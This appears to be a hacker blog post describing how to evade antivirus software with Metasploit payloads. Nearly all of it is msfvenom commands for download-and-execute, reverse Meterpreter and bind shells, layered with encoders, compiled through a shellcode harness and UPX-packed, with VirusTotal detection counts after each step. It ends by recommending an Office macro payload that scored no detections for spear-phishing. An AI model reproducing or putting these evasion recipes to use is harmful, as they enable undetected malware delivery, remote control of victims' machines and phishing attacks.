Using Shellcode execution as a possible antivirus bypassal technique.

 

Ok, first off, we need to create our malicious "shellcode payload"... I have a few examples below of some possible payloads we could be using.

1. Download and execute.

msfvenom -p windows/download_exec URL=http://www.example.com/malware.exe -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f c

2. Reverse Meterpreter HTTPS shell

msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f c

3. Standard Bind Shell

msfvenom -p windows/shell_bind_tcp LPORT=31337 -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f c

These are the three payloads I will be testing. The encoding I chose at random and just went with the encoding that "felt right". I will not be running them, just uploading them to VirusTotal to show you them compared to their .exe outputs. Bin size (before and after UPX) and AV detections will be taken as the final "idea of how awesome they are".

Step One: Download and Execute Payload.

Here is the commands we will be using to make our "native metasploit exe" version (direct MSFVENOM output) of the dl/exec payload.

msfvenom -p windows/download_exec URL=http://www.example.com/malware.exe -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f exe > /tmp/dlexec.exe

So. We got our binary, and we upload to VirusTotal Scanning service to see how many detections we get...

Filename: dlexec.exe
Filesize: 72.1 KB
MD5 Hash: aeace18d84af11640a219b2b557ee8ee
Packing: No UPX used.
Detections: 32/42
(Detections are at time of scan)
Link: https://www.virustotal.com/file/9e5c565e48de976e14d316db667cf22f3b50671f47e38ff0864775e5888ee51b/analysis/1332350345/

Next up we UPX it with this command: upx -9 dlexec.exe

Filesize: 47.0KB
MD5 Hash: ac4375e1a7fe474548dd798bd60f8f04
Detections: 27/43
(Detections are at time of scan)
Link: https://www.virustotal.com/file/fef15aee195c8bdcbbee3cbbc91fab36791a172096f06152e24a9b1862d1405c/analysis/1332350651/

Now, we re-do the whole thing with the ShellCodeExec Method which should be a LOT less detected.

First, we create our shellcode:

msfvenom -p windows/download_exec URL=http://www.example.com/malware.exe -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f c

Now, we pop it into our shellcode-harness...
And compile: i586-mingw32msvc-gcc meta.c -o dlcrypt.exe

Filename: dlcrypt.exe
Filesize: 20.1KB
MD5 Hash: f873ab0d718dbd61b7987c7467ae589c
Packing: No UPX used.
Detections: 14 / 43
(Detections are at time of scan)
Link: https://www.virustotal.com/file/38f34eae9f19c401f61406d80d47e9280fa689b3abcfdfb17571849f69d0de17/analysis/1332351185/

As you can see, it is a far smaller file with a lot less detections. Lets UPX it and see what happens next...

Filename: dlcrypt.exe
Filesize: 14.1 KB
MD5 Hash: 03d634dde3d1e573d99776009e8567f5
Packing: UPX used.
Detections: 18 / 43
(Detections are at time of scan)
Link: https://www.virustotal.com/file/fc6e15bc19fc1f1bfaec9aeac8f2ede308e3d78b3e4efe90ab3b0804d8bafd4d/analysis/1332351313/

It would appear UPX is counterproductive to bypassing AV (packers normally are...) so tomorrow I will try the second payload, my FAVOURITE one, the Meterpreter Reverse HTTPS payload.

Ok. Reverse HTTPS payload time!

Here is the commands we will be using to make our "native metasploit exe" version (direct MSFVENOM output) of the reverse https meterpreter payload.

msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f exe > /tmp/payload.exe

So. We got our binary, and we upload to VirusTotal Scanning service to see how many detections we get...

Filename: payload.exe
Filesize: 72.1 KB
MD5 Hash: dd347fcf69bdbc33f1ea2b318cf4831c
Packing: No UPX used.
Detections: 30 / 43
(Detections are at time of scan)
Link: https://www.virustotal.com/file/6a7cbf711f24a7ff1ae14a83ff193b4c17b3043516d5bd7366a7db736c793b8f/analysis/1332423872/

Next up, we UPX

Filename: payload.exe
Filesize: 47.0 KB
MD5 Hash: 5cdf49f9df5701f76b9ee9f8917e6d05
Packing: UPX used.
Detections: 26 / 42
(Detections are at time of scan)
Link: https://www.virustotal.com/file/fc11cfbcbd5d13a5acce3e4fb82f93133bbc62e8df6d00ff8478faa3bdf1e113/analysis/1332424184/

AS you can see, UPX had a positive effect this time. Now I then noticed something bloody amazing in the MSFVENOM manual.

exe-small output.

msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 -f exe-small > /tmp/payload.exe

No encoding used this time BTW.

Filename: payload.exe
Filesize: 4.5 KB
MD5 Hash: 0bd184dd04ff1015ffbce7e792c2c598
Packing: None
Detections: 13 / 43
Link: https://www.virustotal.com/file/bd9d1d6228e0aad08f3bb885bbf1d8f8e4c78b4530f8dd5b82da96e52b6a5c3f/analysis/1332424669/

SO, lets add some encoding and see what happens...

##

msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f exe-small > 1.exe

https://www.virustotal.com/file/e946566e5c0162c4090f126cb12077926433f66c62c9354fa730242ade663b3c/analysis/1332427945/

More detected? WTF? Fine. lets move on...

##

Now, I started looking into alternative outputs... And came up with this.

msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 -f vba-exe > /tmp/vba.exe

Filename: vba.exe
Filesize: 290.2 KB
MD5 Hash: aedde86916de88b856b22c6e384901bb
Packing: None
Detections: 0 / 42
Link: https://www.virustotal.com/file/66e496f92029e31ab2c9df7ba886502efb3fa471d5451828df7c99d56f71dc56/analysis/1332427482/

This is a MS Office Macro payload. Simply open it in a text editor and follow the instructions...

Final Notes: The MS Office Macro payload is likely the most promising of the lot, as it can be directly embedded into a MS-Word document for spear phishing attacks, and seems to auto bypass things like AV.

Now for ONE LAST TRY: Objdump Pwnage.

root@shinigami:/tmp# msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 -f exe-small > /tmp/micro.exe
root@shinigami:/tmp# wget http://www.projectshellcode.com/downloads/xxd-shellcode.sh
root@shinigami:/tmp# chmod +x xxd-shellcode.sh
root@shinigami:/tmp# ./xxd-shellcode.sh micro.exe > sc.txt
### Here is where you pop the contents of sc.txt into the shellcode test harness as before ###
root@shinigami:/tmp# i586-mingw32msvc-gcc sc.c -o helloshell.exe

SO now we scan our new binary... See how "bypassing" it is. We can take this further BTW...

MD5: 7642f0914ebbe62ddc8d64ffe7d52783
File size: 24.1 KB ( 24650 bytes )
File name: helloshell.exe
File type: Win32 EXE
Detection ratio: 10 / 43
Link: https://www.virustotal.com/file/90add485b7df79d83588412ce59d76707c27914a2d0d86d731669670c4f6bac3/analysis/1332429280/

Next: We UPX it...

MD5: 963253a72210eb8bd7155137713112ba
File size: 16.6 KB ( 16970 bytes )
File name: helloshell.exe
File type: Win32 EXE
Detection ratio: 10 / 41
Link: https://www.virustotal.com/file/6ca78ead1a8ef1c910f921eeab21af48a021db13872a3ad64a6ec6f8c2e228cb/analysis/1332429381/

So then I take this variant, pretend it is micro.exe, and re-encode it...

Result?

PRE UPX:
MD5: a34d634236388762de0801acdd587cc9
File size: 36.1 KB ( 36938 bytes )
File name: helloshell2.exe
File type: Win32 EXE
Detection ratio: 5 / 43
Link: https://www.virustotal.com/file/bc2e51bca3b3895bf59607ab1dbe1bbbfe6fff494642556660d30cf8dae1045e/analysis/1332429607/

POST UPX:
Detections: 10 / 42
Link: https://www.virustotal.com/file/726ced89801acc785f9360d595e7de390c3c19dafeecffcb2db14eb2d00e94b6/analysis/1332429713/

root@shinigami:/tmp# exit

I went up to 10 iterations with no real advantage, but perhaps alternating extra encodings (shigati_ga_nai) may help. i will investigate this later.

~infodox